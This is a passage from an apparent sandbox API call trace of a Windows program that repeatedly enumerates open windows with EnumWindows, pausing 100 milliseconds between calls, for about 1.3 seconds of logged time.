(lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.964] Sleep (dwMilliseconds=0x64) [0134.965] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.966] Sleep (dwMilliseconds=0x64) [0134.967] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.967] Sleep (dwMilliseconds=0x64) [0134.968] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.969] Sleep (dwMilliseconds=0x64) [0134.970] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.970] Sleep (dwMilliseconds=0x64) [0134.973] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.973] Sleep (dwMilliseconds=0x64) [0134.974] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.975] Sleep (dwMilliseconds=0x64) [0134.976] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0134.976] Sleep (dwMilliseconds=0x64) [0135.509] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.510] Sleep (dwMilliseconds=0x64) [0135.511] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.512] Sleep (dwMilliseconds=0x64) [0135.513] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.513] Sleep (dwMilliseconds=0x64) [0135.518] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.518] Sleep (dwMilliseconds=0x64) [0135.520] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.520] Sleep (dwMilliseconds=0x64) [0135.521] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.521] Sleep (dwMilliseconds=0x64) [0135.523] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.523] Sleep (dwMilliseconds=0x64) [0135.524] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.524] Sleep (dwMilliseconds=0x64) [0135.526] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.526] Sleep (dwMilliseconds=0x64) [0135.562] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.562] Sleep (dwMilliseconds=0x64) [0135.635] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.636] Sleep (dwMilliseconds=0x64) [0135.637] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.637] Sleep (dwMilliseconds=0x64) [0135.638] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.639] Sleep (dwMilliseconds=0x64) [0135.640] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.641] Sleep (dwMilliseconds=0x64) [0135.642] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.642] Sleep (dwMilliseconds=0x64) [0135.644] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.644] Sleep (dwMilliseconds=0x64) [0135.645] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.645] Sleep (dwMilliseconds=0x64) [0135.647] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.647] Sleep (dwMilliseconds=0x64) [0135.648] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.649] Sleep (dwMilliseconds=0x64) [0135.650] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.650] Sleep (dwMilliseconds=0x64) [0135.651] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.652] Sleep (dwMilliseconds=0x64) [0135.653] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.653] Sleep (dwMilliseconds=0x64) [0135.654] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.655] Sleep (dwMilliseconds=0x64) [0135.656] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.656] Sleep (dwMilliseconds=0x64) [0135.657] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.658] Sleep (dwMilliseconds=0x64) [0135.659] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.659] Sleep (dwMilliseconds=0x64) [0135.660] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.661] Sleep (dwMilliseconds=0x64) [0135.662] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.662] Sleep (dwMilliseconds=0x64) [0135.663] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.667] Sleep (dwMilliseconds=0x64) [0135.669] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.669] Sleep (dwMilliseconds=0x64) [0135.670] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.671] Sleep (dwMilliseconds=0x64) [0135.672] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.673] Sleep (dwMilliseconds=0x64) [0135.675] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.676] Sleep (dwMilliseconds=0x64) [0135.677] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.677] Sleep (dwMilliseconds=0x64) [0135.678] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.679] Sleep (dwMilliseconds=0x64) [0135.680] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.680] Sleep (dwMilliseconds=0x64) [0135.681] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.682] Sleep (dwMilliseconds=0x64) [0135.683] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.683] Sleep (dwMilliseconds=0x64) [0135.685] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.685] Sleep (dwMilliseconds=0x64) [0135.687] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.687] Sleep (dwMilliseconds=0x64) [0135.688] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.689] Sleep (dwMilliseconds=0x64) [0135.690] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.690] Sleep (dwMilliseconds=0x64) [0135.691] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.692] Sleep (dwMilliseconds=0x64) [0135.693] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.693] Sleep (dwMilliseconds=0x64) [0135.694] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.695] Sleep (dwMilliseconds=0x64) [0135.696] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.696] Sleep (dwMilliseconds=0x64) [0135.697] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.698] Sleep (dwMilliseconds=0x64) [0135.699] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.699] Sleep (dwMilliseconds=0x64) [0135.700] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.701] Sleep (dwMilliseconds=0x64) [0135.702] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.702] Sleep (dwMilliseconds=0x64) [0135.703] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.704] Sleep (dwMilliseconds=0x64) [0135.705] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.705] Sleep (dwMilliseconds=0x64) [0135.710] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.710] Sleep (dwMilliseconds=0x64) [0135.713] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.713] Sleep (dwMilliseconds=0x64) [0135.714] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.714] Sleep (dwMilliseconds=0x64) [0135.716] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.716] Sleep (dwMilliseconds=0x64) [0135.717] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.717] Sleep (dwMilliseconds=0x64) [0135.719] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.719] Sleep (dwMilliseconds=0x64) [0135.720] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.720] Sleep (dwMilliseconds=0x64) [0135.722] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.722] Sleep (dwMilliseconds=0x64) [0135.723] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.723] Sleep (dwMilliseconds=0x64) [0135.725] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.725] Sleep (dwMilliseconds=0x64) [0135.726] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.727] Sleep (dwMilliseconds=0x64) [0135.728] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.728] Sleep (dwMilliseconds=0x64) [0135.730] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.731] Sleep (dwMilliseconds=0x64) [0135.732] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.732] Sleep (dwMilliseconds=0x64) [0135.734] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.734] Sleep (dwMilliseconds=0x64) [0135.735] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.735] Sleep (dwMilliseconds=0x64) [0135.737] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.737] Sleep (dwMilliseconds=0x64) [0135.738] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.738] Sleep (dwMilliseconds=0x64) [0135.740] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.740] Sleep (dwMilliseconds=0x64) [0135.742] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.742] Sleep (dwMilliseconds=0x64) [0135.743] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.743] Sleep (dwMilliseconds=0x64) [0135.745] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.745] Sleep (dwMilliseconds=0x64) [0135.746] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.746] Sleep (dwMilliseconds=0x64) [0135.750] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.750] Sleep (dwMilliseconds=0x64) [0135.752] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.752] Sleep (dwMilliseconds=0x64) [0135.753] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.754] Sleep (dwMilliseconds=0x64) [0135.755] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.755] Sleep (dwMilliseconds=0x64) [0135.757] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.757] Sleep (dwMilliseconds=0x64) [0135.759] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.759] Sleep (dwMilliseconds=0x64) [0135.760] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.761] Sleep (dwMilliseconds=0x64) [0135.762] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.763] Sleep (dwMilliseconds=0x64) [0135.764] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.764] Sleep (dwMilliseconds=0x64) [0135.766] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.766] Sleep (dwMilliseconds=0x64) [0135.767] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.767] Sleep (dwMilliseconds=0x64) [0135.769] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.769] Sleep (dwMilliseconds=0x64) [0135.771] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.771] Sleep (dwMilliseconds=0x64) [0135.772] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.772] Sleep (dwMilliseconds=0x64) [0135.774] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.774] Sleep (dwMilliseconds=0x64) [0135.776] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.776] Sleep (dwMilliseconds=0x64) [0135.777] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.778] Sleep (dwMilliseconds=0x64) [0135.779] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.779] Sleep (dwMilliseconds=0x64) [0135.781] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.781] Sleep (dwMilliseconds=0x64) [0135.782] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.783] Sleep (dwMilliseconds=0x64) [0135.785] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.785] Sleep (dwMilliseconds=0x64) [0135.787] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.787] Sleep (dwMilliseconds=0x64) [0135.788] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.788] Sleep (dwMilliseconds=0x64) [0135.790] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.850] Sleep (dwMilliseconds=0x64) [0135.851] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.851] Sleep (dwMilliseconds=0x64) [0135.853] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.853] Sleep (dwMilliseconds=0x64) [0135.861] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.861] Sleep (dwMilliseconds=0x64) [0135.863] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.863] Sleep (dwMilliseconds=0x64) [0135.864] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.864] Sleep (dwMilliseconds=0x64) [0135.866] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.866] Sleep (dwMilliseconds=0x64) [0135.867] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.867] Sleep (dwMilliseconds=0x64) [0135.869] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.869] Sleep (dwMilliseconds=0x64) [0135.870] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.870] Sleep (dwMilliseconds=0x64) [0135.872] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.872] Sleep (dwMilliseconds=0x64) [0135.873] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.873] Sleep (dwMilliseconds=0x64) [0135.875] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.875] Sleep (dwMilliseconds=0x64) [0135.876] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.876] Sleep (dwMilliseconds=0x64) [0135.878] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.878] Sleep (dwMilliseconds=0x64) [0135.880] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.880] Sleep (dwMilliseconds=0x64) [0135.881] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.881] Sleep (dwMilliseconds=0x64) [0135.883] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.883] Sleep (dwMilliseconds=0x64) [0135.885] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.885] Sleep (dwMilliseconds=0x64) [0135.887] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.887] Sleep (dwMilliseconds=0x64) [0135.888] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.888] Sleep (dwMilliseconds=0x64) [0135.890] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.890] Sleep (dwMilliseconds=0x64) [0135.891] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.892] Sleep (dwMilliseconds=0x64) [0135.894] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.894] Sleep (dwMilliseconds=0x64) [0135.896] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.896] Sleep (dwMilliseconds=0x64) [0135.897] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.897] Sleep (dwMilliseconds=0x64) [0135.899] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.900] Sleep (dwMilliseconds=0x64) [0135.901] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.901] Sleep (dwMilliseconds=0x64) [0135.903] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.903] Sleep (dwMilliseconds=0x64) [0135.904] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.905] Sleep (dwMilliseconds=0x64) [0135.906] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.906] Sleep (dwMilliseconds=0x64) [0135.907] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.908] Sleep (dwMilliseconds=0x64) [0135.909] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.910] Sleep (dwMilliseconds=0x64) [0135.911] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.911] Sleep (dwMilliseconds=0x64) [0135.913] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.913] Sleep (dwMilliseconds=0x64) [0135.914] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.914] Sleep (dwMilliseconds=0x64) [0135.915] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.916] Sleep (dwMilliseconds=0x64) [0135.917] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.917] Sleep (dwMilliseconds=0x64) [0135.918] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.919] Sleep (dwMilliseconds=0x64) [0135.920] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.920] Sleep (dwMilliseconds=0x64) [0135.922] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.922] Sleep (dwMilliseconds=0x64) [0135.924] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.924] Sleep (dwMilliseconds=0x64) [0135.925] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.926] Sleep (dwMilliseconds=0x64) [0135.927] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.927] Sleep (dwMilliseconds=0x64) [0135.928] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.929] Sleep (dwMilliseconds=0x64) [0135.930] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.930] Sleep (dwMilliseconds=0x64) [0135.931] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.932] Sleep (dwMilliseconds=0x64) [0135.933] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.933] Sleep (dwMilliseconds=0x64) [0135.934] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.935] Sleep (dwMilliseconds=0x64) [0135.936] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.937] Sleep (dwMilliseconds=0x64) [0135.938] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.938] Sleep (dwMilliseconds=0x64) [0135.939] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.940] Sleep (dwMilliseconds=0x64) [0135.941] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.941] Sleep (dwMilliseconds=0x64) [0135.942] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.943] Sleep (dwMilliseconds=0x64) [0135.944] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.944] Sleep (dwMilliseconds=0x64) [0135.945] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.946] Sleep (dwMilliseconds=0x64) [0135.947] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.947] Sleep (dwMilliseconds=0x64) [0135.948] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.949] Sleep (dwMilliseconds=0x64) [0135.950] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.950] Sleep (dwMilliseconds=0x64) [0135.951] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.952] Sleep (dwMilliseconds=0x64) [0135.953] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.954] Sleep (dwMilliseconds=0x64) [0135.955] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.956] Sleep (dwMilliseconds=0x64) [0135.957] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.957] Sleep (dwMilliseconds=0x64) [0135.958] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.959] Sleep (dwMilliseconds=0x64) [0135.960] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.960] Sleep (dwMilliseconds=0x64) [0135.962] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.962] Sleep (dwMilliseconds=0x64) [0135.963] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.963] Sleep (dwMilliseconds=0x64) [0135.965] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0135.965] Sleep (dwMilliseconds=0x64) [0136.016] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.016] Sleep (dwMilliseconds=0x64) [0136.018] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.018] Sleep (dwMilliseconds=0x64) [0136.019] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.019] Sleep (dwMilliseconds=0x64) [0136.022] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.022] Sleep (dwMilliseconds=0x64) [0136.024] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.024] Sleep (dwMilliseconds=0x64) [0136.026] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.026] Sleep (dwMilliseconds=0x64) [0136.039] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.039] Sleep (dwMilliseconds=0x64) [0136.041] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.042] Sleep (dwMilliseconds=0x64) [0136.043] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.043] Sleep (dwMilliseconds=0x64) [0136.045] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.045] Sleep (dwMilliseconds=0x64) [0136.046] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.047] Sleep (dwMilliseconds=0x64) [0136.049] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.049] Sleep (dwMilliseconds=0x64) [0136.050] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.050] Sleep (dwMilliseconds=0x64) [0136.052] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.052] Sleep (dwMilliseconds=0x64) [0136.055] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.055] Sleep (dwMilliseconds=0x64) [0136.057] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.057] Sleep (dwMilliseconds=0x64) [0136.058] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.058] Sleep (dwMilliseconds=0x64) [0136.060] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.060] Sleep (dwMilliseconds=0x64) [0136.062] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.062] Sleep (dwMilliseconds=0x64) [0136.064] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.064] Sleep (dwMilliseconds=0x64) [0136.065] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.065] Sleep (dwMilliseconds=0x64) [0136.067] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.067] Sleep (dwMilliseconds=0x64) [0136.069] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.069] Sleep (dwMilliseconds=0x64) [0136.071] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.073] Sleep (dwMilliseconds=0x64) [0136.075] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.075] Sleep (dwMilliseconds=0x64) [0136.077] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.077] Sleep (dwMilliseconds=0x64) [0136.078] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.078] Sleep (dwMilliseconds=0x64) [0136.080] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.080] Sleep (dwMilliseconds=0x64) [0136.081] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.081] Sleep (dwMilliseconds=0x64) [0136.083] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.083] Sleep (dwMilliseconds=0x64) [0136.087] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.087] Sleep (dwMilliseconds=0x64) [0136.089] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.089] Sleep (dwMilliseconds=0x64) [0136.092] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.092] Sleep (dwMilliseconds=0x64) [0136.094] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.094] Sleep (dwMilliseconds=0x64) [0136.095] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.095] Sleep (dwMilliseconds=0x64) [0136.097] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.097] Sleep (dwMilliseconds=0x64) [0136.098] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.098] Sleep (dwMilliseconds=0x64) [0136.100] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.100] Sleep (dwMilliseconds=0x64) [0136.101] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.101] Sleep (dwMilliseconds=0x64) [0136.103] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.103] Sleep (dwMilliseconds=0x64) [0136.104] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.104] Sleep (dwMilliseconds=0x64) [0136.106] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.106] Sleep (dwMilliseconds=0x64) [0136.107] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.107] Sleep (dwMilliseconds=0x64) [0136.112] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.112] Sleep (dwMilliseconds=0x64) [0136.113] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.113] Sleep (dwMilliseconds=0x64) [0136.115] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.115] Sleep (dwMilliseconds=0x64) [0136.116] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.116] Sleep (dwMilliseconds=0x64) [0136.118] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.118] Sleep (dwMilliseconds=0x64) [0136.120] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.120] Sleep (dwMilliseconds=0x64) [0136.122] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.122] Sleep (dwMilliseconds=0x64) [0136.123] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.123] Sleep (dwMilliseconds=0x64) [0136.125] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.125] Sleep (dwMilliseconds=0x64) [0136.137] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.137] Sleep (dwMilliseconds=0x64) [0136.140] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.140] Sleep (dwMilliseconds=0x64) [0136.142] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.142] Sleep (dwMilliseconds=0x64) [0136.143] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.143] Sleep (dwMilliseconds=0x64) [0136.145] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.145] Sleep (dwMilliseconds=0x64) [0136.146] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.146] Sleep (dwMilliseconds=0x64) [0136.148] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.149] Sleep (dwMilliseconds=0x64) [0136.150] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.150] Sleep (dwMilliseconds=0x64) [0136.203] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.203] Sleep (dwMilliseconds=0x64) [0136.211] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.211] Sleep (dwMilliseconds=0x64) [0136.221] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.222] Sleep (dwMilliseconds=0x64) [0136.223] EnumWindows (lpEnumFunc=0x523ec0, lParam=0x2830000) [0136.223] Sleep (dwMilliseconds=0x64) [0136.228] EnumWindows 